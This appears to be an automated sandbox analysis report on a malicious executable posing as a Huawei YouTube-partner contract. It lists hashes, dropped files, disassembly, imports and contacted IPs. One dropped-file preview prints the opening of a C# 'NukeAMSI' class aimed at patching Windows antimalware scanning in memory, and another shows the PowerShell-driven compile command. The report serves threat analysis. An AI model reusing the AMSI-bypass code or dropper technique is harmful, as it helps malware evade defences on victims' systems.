JV4lf0wkWV.exe | malicious | Unknown | 172.67.19.24, 149.154.167.220
https://www.buildwithbrick.com/ | malicious | Unknown | 172.67.19.24, 149.154.167.220
BN.exe | malicious | Quasar | 172.67.19.24, 149.154.167.220
sHsYUp3BAs.exe | malicious | DragonForce | 172.67.19.24, 149.154.167.220
cool.exe | malicious | Discord Rat | 172.67.19.24, 149.154.167.220

No context
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false
Reputation: high, very likely benign file
Preview: @...e...........................................................

Process: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe
File Type: PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 693735
Entropy (8bit): 7.9279444630284495
Encrypted: false
SSDEEP: 12288:fn+jhBLpHfnjpgW2/N++GVfcstiMh11QmwTH4M1QLr7r4vNjpLmmRdSo5dunWFJ:fn+PFfnyW2/2fr7jQL464eN1FxXunWFJ
MD5: AA166269F78A0D3FF73EE14552465A67
SHA1: 94A7B5A71FDCF2C77E3437EBBDCDEE3A9051DA88
SHA-256: 7A27323670CD8385C0C6B38AA48062602F919B7DC6F4D3D15909A7B03990CFBE
SHA-512: 0206BD39259137338152F6851CF84C32346CDD6EFA3EA37C29D2BD0CF1FBF7B3B4FAF0E5296D6A922BB7BC531FED86F57C2A4F6B8556B601FDCCDA639AB0AF4A
Malicious: false
Preview: .PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....]....s.U.j..~]...rU..]U..W]...z4mWu.. ...2.9al.D...$..`\..d..HB.$..J.@`.....o...w.u.I..+....7.Zs..>.J ..\{.js...e}.^oB...[Q......C.x.c.....S. ......Q|#.Q...KFcOK.y...].j...X/..R?{d..zeD...S.....3.nPj..tD.....O.......S?eM[.N.......X.....#.N.>..WV..q/...c^.]~.BO........o..}......}.yn....mI.E\...o.=.A.7...;.....S.~..':.......[.........G......F@.K.U...5._..../<.....}.D.g......b..{4..h.X>..a.U}.......}p..<P...C.....C..ea.g......B...'..Z.Zb.......d..y.1{.../.....4...1...Z.....(.80.#...{.0.<..[..o..Ul.A.....=._....7A_...`....$...$../....[.O...C..{C}.E.....'>~.xo1.. .v.K..3!...<....~m..i.q......X_..m.q..sQ..W..q..qn....n...}...{.}c....3..#...P.......g.{.}....].`.....mm..R.=.$.........?......vOj5Vl`...q.].N0....%.w........qW....lB..y.<.X....x..w....L..3..F...Q..9.0nz...A{..v...fZ.....V.b.w..).OLy.8......;.1.O...-....)...m).\].k1..i.qq,&.kN.

Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type: Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols, created Mon Feb 17 19:46:57 2025, 1st section name ".debug$S"
Category: dropped
Size (bytes): 1340
Entropy (8bit): 4.006116877413264
Encrypted: false
SSDEEP: 24:HbK9ocaKp+tbaHywKKjmNII+ycuZhNbYakSINPNnqSed:LZA3pKMmu1ulbYa3IXqS+
MD5: 12452F6B796ED16235E4DCE4C4E4E82D
SHA1: CDCDB19887CB10FA94DF84F60B9543965B50DFD9
SHA-256: 83A3F9E4D64EA15E03A66F67BA6ED99A92B53CF019E58A67B3372D84138B6829
SHA-512: DB7BB2DE4BEC213188B02AB7896F2E716DD91C8AA27ADAC1F34A819D3CB2C7C86B950D4BCCBAF4D090D319C9DC9D7AF63C29CE10E2E2DFABD54670582C6D604A
Malicious: false
Preview: L...1..g.............debug$S........X...................@..B.rsrc$01........X.......<...........@..@.rsrc$02........P...F...............@..@........V....c:\Users\user\AppData\Local\Temp\jwryu2yd\CSC4A1A778723A0488D9C81AB4CE7B7E2B.TMP.....................C.n..(..J...........7.......C:\Users\user\AppData\Local\Temp\RESD333.tmp.-.<....................a..Microsoft (R) CVTRES.a.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.w.r.y.u.2.y.d...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                            File Type:MSVC .res
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):652
                                                                                                                                                                                            Entropy (8bit):3.112732027448755
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry/BYak7YnqqcBNPN5Dlq5J:+RI+ycuZhNbYakSINPNnqX
                                                                                                                                                                                            MD5:9A1A14AA43816E0CCBB328CCA0F94AC6
                                                                                                                                                                                            SHA1:80BA4EA115B0201CA3F36C3824D913845251E645
                                                                                                                                                                                            SHA-256:11039D97294F8DEBA7AF9B26619D57686F129AA362057E976C4D8907F515FA34
                                                                                                                                                                                            SHA-512:C34B4C328C6A76D584CE470A3D4ACCD50BEC1C9F0C55A10995E33F2CB9BE4DDE13838158FC3BDA544F18EB7DB95F8295BAE7992D9B56225EA4C3B1073C3C62FD
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.w.r.y.u.2.y.d...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...j.w.r.y.u.2.y.d...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):2251
Entropy (8bit):5.037863634769049
Encrypted:false
SSDEEP:48:JoOuOAXQbx7TBdBLMUgs94+gl+IC+YrI5IFfRW8:JoOgacG3U1cU8
MD5:2C374853E019C145F1168AD3528E727A
SHA1:7D0F43BF5FFBA8C166D450FF3096C77EB51B118E
SHA-256:87CF3574FF2F8C971698099C7AEBEA76E7DF657E063B384A07BD31DE28A5BDAF
SHA-512:4AEC3D17CB3D22212ED1E87C01144729FD49EA65963C75CF18876516140303956D3933D1044F13F33D2A551E5F7B61A084350A1A1E727FBA56F81763EFFC1DAE
Malicious:false
Preview:.using System;..using System.Diagnostics;..using System.Runtime.InteropServices;....public class NukeAMSI..{.. public const int PROCESS_VM_OPERATION = 0x0008;.. public const int PROCESS_VM_READ = 0x0010;.. public const int PROCESS_VM_WRITE = 0x0020;.. public const uint PAGE_EXECUTE_READWRITE = 0x40;.... // NtOpenProcess: Opens a handle to a process... [DllImport("ntdll.dll")].. public static extern int NtOpenProcess(out IntPtr ProcessHandle, uint DesiredAccess, [In] ref OBJECT_ATTRIBUTES ObjectAttributes, [In] ref CLIENT_ID ClientId);.... // NtWriteVirtualMemory: Writes to the memory of a process... [DllImport("ntdll.dll")].. public static extern int NtWriteVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, byte[] Buffer, uint NumberOfBytesToWrite, out uint NumberOfBytesWritten);.... // NtClose: Closes an open handle... [DllImport("ntdll.dll")].. public static extern int NtClose(IntPtr Handle);.... // LoadLibrary: Loads the specified mod

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (372), with no line terminators
Category:dropped
Size (bytes):375
Entropy (8bit):5.243693707189317
Encrypted:false
SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fpPqa9BUzxs7+AEszIN723fpPqa9bn:p37Lvkmb6K2aBP1wWZETaBP1t
MD5:4757EF9DB588F9D8BB6E70DF3E501B75
SHA1:8D67673F9C2F592B0A6976833F0BE64DCDAB8BB7
SHA-256:7D7092D3B45D6322AAD480B12C23D262B263166B171A7A836DADF9AFC7BA9875
SHA-512:2DFADF82638840AC9322375CA6748C00628BA5400769AE92CB080509C8CEA7BB383BB036275F2F11381D9BB233648114EBB8828403BB054F3520B3D993708656
Malicious:true
Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.0.cs"

Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):4096
Entropy (8bit):3.6121954860344205
Encrypted:false
SSDEEP:48:6+fOVuHIbGzozQLXNJGhjRbd7lzm8DuJE6Un6+Y1ulbYa3IXq:7OV/KxNy7JmT/+LSK
MD5:FBF99E8F48E2BAE63F7E8C5D0F58EA2B
SHA1:A1DD9B7A89F9328684235E6F00114A656B9B2A5C
SHA-256:5C1AAE2A788C9C9620CA35F2A4CB9D4471C1F0243279BB9ADFD113AC70DA3D0F
SHA-512:F45D839801FCFB3BF0ECE465ACD0606ECDD9EB50610FACE748917A13D87A15B7C312F0B821BA11A17ED0EF28A93CB3DA7B8473DE3EFEDE60D85CA22EADE6EC02
Malicious:false
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1..g...........!.................'... ...@....... ....................................@.................................8'..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p'......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~......0...#Strings....0.......#US.8.......#GUID...H.......#Blob...........W.........%3........................................................................L.E...S.E.................}.....}...............$................................... .............2.........V.]...V.r...V.....V...............Z.....Z...'.....2.Z...E.Z...^.Z...l.Z........ ..$.........

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (457), with CRLF, CR line terminators
Category:modified
Size (bytes):878
Entropy (8bit):5.3201583621046815
Encrypted:false
SSDEEP:24:KOuId3ka6K2aVETaUKax5DqBVKVrdFAMBJTH:ykka6CVE+UK2DcVKdBJj
MD5:6F153A0EDBF93A05A80983CEAD034153
SHA1:1619DA3A29934D7F1F4975A168F2936AAFB09D33
SHA-256:05867189AA106D697280D4CB8967EA7DBCFBD18AA33539ABACA0F193365A9300
SHA-512:F77F2D8E940BD0227F83EB358659A51C95C72B9A607070C6B0A9C9D20E63FB5C1951D3C32656FBF1268E6B99A09DB23CC28C7F38351DCF1E9449ACF92E5FFB5D
Malicious:false
Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

File type:PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):7.939172897483072
TrID:
• Win64 Executable GUI (202006/5) 92.65%
• Win64 Executable (generic) (12005/4) 5.51%
• Generic Win/DOS Executable (2004/3) 0.92%
• DOS Executable Generic (2002/1) 0.92%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:[Huawei] Contract for YouTube partners.exe
File size:72'795'027 bytes
MD5:dd0b202977b83e0c52c2537616c7a620
SHA1:2222a2298b601ba778f6b15e6ed93116de5e2662
SHA256:86cea9c754cf8904e57e345cd6e1af7023c60590c5407a92492a7cf5017c89b7
SHA512:21c8235fee361ef02221d209ceb37a528818010bf952d90dc092ede5256b4b8aa04836062895e92af5f8d56ca531c175db2febae0dc662c5d7938cd5a6267716
SSDEEP:1572864:wBcFe++k4HZyHFp3154XnS7NoUt7YYf1ZfQ6LG:wBcFH+k4HZaFqXQjt7YYtZoj
TLSH:D6F72352E2F900E8D4BAC0B8C6575617FBB27855133097EB62648A692F33BE06F7D311
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Y..N8.DN8.DN8.DG@vDX8.D...EZ8.D...E\8.D...E.8.D>..EF8.D>..EC8.DN8.DF:.D]..E[8.D]..E.:.D]..EO8.D]..DO8.D]..EO8.DRichN8.D.......
Icon Hash:0544801b6464f40b
Entrypoint:0x1405cfea0
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x140000000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:0x66E8BB0A [Mon Sep 16 23:11:06 2024 UTC]
TLS Callbacks:0x405cf320, 0x1, 0x405cfae0, 0x1
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:4b1892ce4fbcfcf064c6f69d693fc6a5

Instruction
dec eax
sub esp, 28h
call 00007F1C28673E48h
dec eax
add esp, 28h
jmp 00007F1C2867378Fh
int3
int3
dec eax
sub esp, 28h
call 00007F1C28362828h
jmp 00007F1C28673924h
xor eax, eax
dec eax
add esp, 28h
ret
int3
int3
jmp 00007F1C2867390Ch
int3
int3
int3
dec eax
mov dword ptr [esp+10h], ebx
dec eax
mov dword ptr [esp+18h], esi
push ebp
push edi
inc ecx
push esi
dec eax
mov ebp, esp
dec eax
sub esp, 10h
xor eax, eax
xor ecx, ecx
cpuid
inc esp
mov eax, ecx
inc esp
mov edx, edx
inc ecx
xor edx, 49656E69h
inc ecx
xor eax, 6C65746Eh
inc esp
mov ecx, ebx
inc esp
mov esi, eax
xor ecx, ecx
mov eax, 00000001h
cpuid
inc ebp
or edx, eax
mov dword ptr [ebp-10h], eax
                                                                                                                                                                                            inc ecx
                                                                                                                                                                                            xor ecx, 756E6547h
                                                                                                                                                                                            mov dword ptr [ebp-0Ch], ebx
                                                                                                                                                                                            inc ebp
                                                                                                                                                                                            or edx, ecx
                                                                                                                                                                                            mov dword ptr [ebp-08h], ecx
                                                                                                                                                                                            mov edi, ecx
                                                                                                                                                                                            mov dword ptr [ebp-04h], edx
                                                                                                                                                                                            jne 00007F1C2867397Dh
                                                                                                                                                                                            dec eax
                                                                                                                                                                                            or dword ptr [001CA16Dh], FFFFFFFFh
                                                                                                                                                                                            and eax, 0FFF3FF0h
                                                                                                                                                                                            dec eax
                                                                                                                                                                                            mov dword ptr [001CA155h], 00008000h
                                                                                                                                                                                            cmp eax, 000106C0h
                                                                                                                                                                                            je 00007F1C2867394Ah
                                                                                                                                                                                            cmp eax, 00020660h
                                                                                                                                                                                            je 00007F1C28673943h
                                                                                                                                                                                            cmp eax, 00020670h
                                                                                                                                                                                            je 00007F1C2867393Ch
                                                                                                                                                                                            add eax, FFFCF9B0h
                                                                                                                                                                                            cmp eax, 20h
                                                                                                                                                                                            jnbe 00007F1C28673946h
                                                                                                                                                                                            dec eax
                                                                                                                                                                                            mov ecx, 00010001h
Programming Language:
• [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x796610 | 0xc4 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7966d4 | 0x168 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x807000 | 0x157bb8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x7ba000 | 0x36108 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x95f000 | 0x7e40 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x70a590 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x70a780 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x624540 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x61d000 | 0xec8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x7963c4 | 0x60 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x61a73c | 0x61a800 | 32fb681841ec789e18907ede031c730a | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.CLR_UEF | 0x61c000 | 0xdd | 0x200 | 14c7c1a772bf5678f6bc4cd70c47286b | False | 0.412109375 | zlib compressed data | 3.105277605145925 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x61d000 | 0x17c502 | 0x17c600 | c0301a93ba6b92ac6c0cdc256d233aa6 | False | 0.4177697790009859 | data | 5.657411636977683 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x79a000 | 0x1fdc4 | 0x9800 | e570686fc5a365327c9cdeea2c075c0f | False | 0.19862767269736842 | data | 3.3326535232800643 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x7ba000 | 0x36108 | 0x36200 | a0a4d8cd5d309cba79b281b718f2e550 | False | 0.5047362153579676 | data | 6.504683455441252 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.didat | 0x7f1000 | 0x38 | 0x200 | 36167374d760b7cd2774572f5a2f5b50 | False | 0.06640625 | data | 0.42693031941489346 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Section | 0x7f2000 | 0x8 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
_RDATA | 0x7f3000 | 0x13208 | 0x13400 | 617430a8cd708dda1865fee2910d8a1a | False | 0.18454494724025974 | data | 5.4827244286074395 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x807000 | 0x157bb8 | 0x157c00 | d66c62b873ceb3306225c72216c2f173 | False | 0.41539275568181816 | data | 6.30497099669662 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x95f000 | 0x7e40 | 0x8000 | 9686b4d395a684e3d9644cbe525a3ece | False | 0.1556396484375 | data | 5.447589681185815 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x807200 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 80630 x 80630 px/m | | | 0.0639417958121377
RT_RCDATA | 0x817a28 | 0x24 | data | | | 1.1944444444444444
RT_RCDATA | 0x817a4c | 0x24 | data | | | 1.1944444444444444
RT_RCDATA | 0x817a70 | 0x146c18 | PE32+ executable (DLL) (GUI) x86-64, for MS Windows | | | 0.4392890930175781
RT_GROUP_ICON | 0x95e688 | 0x14 | data | | | 1.15
RT_VERSION | 0x95e69c | 0x2c0 | data | | | 0.4318181818181818
RT_MANIFEST | 0x95e95c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
KERNEL32.dll | RaiseException, FreeLibrary, SetErrorMode, RaiseFailFastException, GetExitCodeProcess, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, AddVectoredExceptionHandler, MultiByteToWideChar, GetTickCount, FlushInstructionCache, QueryPerformanceFrequency, QueryPerformanceCounter, RtlLookupFunctionEntry, LocateXStateFeature, RtlDeleteFunctionTable, InterlockedPushEntrySList, InterlockedFlushSList, InitializeSListHead, GetTickCount64, DuplicateHandle, QueueUserAPC, WaitForSingleObjectEx, SetThreadPriority, GetThreadPriority, GetCurrentThreadId, TlsAlloc, GetCurrentThread, GetCurrentProcessId, CreateThread, GetModuleHandleW, WaitForMultipleObjectsEx, SignalObjectAndWait, RtlCaptureContext, SetThreadStackGuarantee, VirtualQuery, WriteFile, GetStdHandle, GetConsoleOutputCP, MapViewOfFileEx, UnmapViewOfFile, GetStringTypeExW, InterlockedPopEntrySList, ExitProcess, Sleep, CreateMemoryResourceNotification, VirtualAlloc, VirtualFree, VirtualProtect, SleepEx, SwitchToThread, SuspendThread, ResumeThread, InitializeContext, SetXStateFeaturesMask, RtlRestoreContext, CloseThreadpoolTimer, CreateThreadpoolTimer, SetThreadpoolTimer, ReadFile, GetFileSize, GetEnvironmentVariableW, SetEnvironmentVariableW, CreateEventW, SetEvent, ResetEvent, GetThreadContext, SetThreadContext, GetEnabledXStateFeatures, CopyContext, WerRegisterRuntimeExceptionModule, RtlInstallFunctionTableCallback, GetSystemDefaultLCID, GetUserDefaultLCID, RtlUnwind, HeapAlloc, HeapFree, GetProcessHeap, HeapCreate, HeapDestroy, GetEnvironmentStringsW, FreeEnvironmentStringsW, FormatMessageW, CreateSemaphoreExW, ReleaseSemaphore, GetACP, LCMapStringEx, LocalFree, VerSetConditionMask, VerifyVersionInfoW, QueryThreadCycleTime, GetLogicalProcessorInformationEx, SetThreadGroupAffinity, GetThreadGroupAffinity, GetProcessGroupAffinity, GetCurrentProcessorNumberEx, GetProcessAffinityMask, QueryInformationJobObject, CloseHandle, GetSystemTimeAsFileTime, GetModuleFileNameW, CreateProcessW, GetCPInfo, LoadLibraryExW, CreateFileW, GetFileAttributesExW, GetFullPathNameW, LoadLibraryExA, OutputDebugStringA, OpenEventW, ReleaseMutex, ExitThread, CreateMutexW, HeapReAlloc, CreateNamedPipeA, WaitForMultipleObjects, DisconnectNamedPipe, CreateFileA, CancelIoEx, GetOverlappedResult, ConnectNamedPipe, FlushFileBuffers, SetFilePointer, MapViewOfFile, GetActiveProcessorGroupCount, GetSystemTime, SetConsoleCtrlHandler, GetLocaleInfoEx, GetUserDefaultLocaleName, RtlAddFunctionTable, LoadLibraryW, CreateDirectoryW, RemoveDirectoryW, CreateActCtxW, ActivateActCtx, FindResourceW, GetWindowsDirectoryW, GetFileSizeEx, FindFirstFileExW, FindNextFileW, GetTempPathW, FindClose, LoadLibraryA, GetCurrentDirectoryW, IsWow64Process, EncodePointer, DecodePointer, CreateFileMappingA, TlsSetValue, TlsGetValue, GetSystemInfo, GetCurrentProcess, OutputDebugStringW, IsDebuggerPresent, LeaveCriticalSection, EnterCriticalSection, DeleteCriticalSection, InitializeCriticalSection, WideCharToMultiByte, GetCommandLineW, GetProcAddress, GetModuleHandleExW, SetThreadErrorMode, FlushProcessWriteBuffers, SetLastError, DebugBreak, WaitForSingleObject, GetNumaHighestNodeNumber, SetThreadAffinityMask, SetThreadIdealProcessorEx, GetThreadIdealProcessorEx, VirtualAllocExNuma, GetNumaProcessorNodeEx, VirtualUnlock, GetLargePageMinimum, IsProcessInJob, K32GetProcessMemoryInfo, GetLogicalProcessorInformation, GlobalMemoryStatusEx, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, WakeAllConditionVariable, SleepConditionVariableSRW, RtlVirtualUnwind, IsProcessorFeaturePresent, RtlUnwindEx, InitializeCriticalSectionAndSpinCount, TlsFree, RtlPcToFileHeader, TryAcquireSRWLockExclusive, GetExitCodeThread, GetStringTypeW, InitializeCriticalSectionEx, GetLastError, CreateFileMappingW
ADVAPI32.dll | ReportEventW, AdjustTokenPrivileges, RegGetValueW, SetKernelObjectSecurity, GetSidSubAuthorityCount, GetSidSubAuthority, GetTokenInformation, OpenProcessToken, DeregisterEventSource, RegisterEventSourceW, RegQueryValueExW, RegOpenKeyExW, RegCloseKey, EventRegister, SetThreadToken, RevertToSelf, OpenThreadToken, EventWriteTransfer, EventWrite, LookupPrivilegeValueW
ole32.dll | CreateStreamOnHGlobal, CoRevokeInitializeSpy, CoGetClassObject, CoGetContextToken, CoGetObjectContext, CoUnmarshalInterface, CoMarshalInterface, CoGetMarshalSizeMax, CLSIDFromProgID, CoReleaseMarshalData, CoTaskMemFree, CoTaskMemAlloc, CoCreateGuid, CoInitializeEx, CoRegisterInitializeSpy, CoWaitForMultipleHandles, CoUninitialize, CoCreateFreeThreadedMarshaler
OLEAUT32.dll | CreateErrorInfo, SysFreeString, GetErrorInfo, SetErrorInfo, SysStringLen, SysAllocString, SysAllocStringLen, SafeArrayGetDim, SafeArrayGetLBound, SafeArrayDestroy, QueryPathOfRegTypeLib, LoadTypeLibEx, SafeArrayGetVartype, VariantChangeType, VariantChangeTypeEx, VariantClear, VariantInit, VarCyFromDec, SafeArrayAllocDescriptorEx, GetRecordInfoFromTypeInfo, SafeArraySetRecordInfo, SafeArrayAllocData, SafeArrayGetElemsize, SysStringByteLen, SysAllocStringByteLen, SafeArrayCreateVector, SafeArrayPutElement, LoadRegTypeLib
USER32.dll | LoadStringW, MessageBoxW
SHELL32.dll | ShellExecuteW
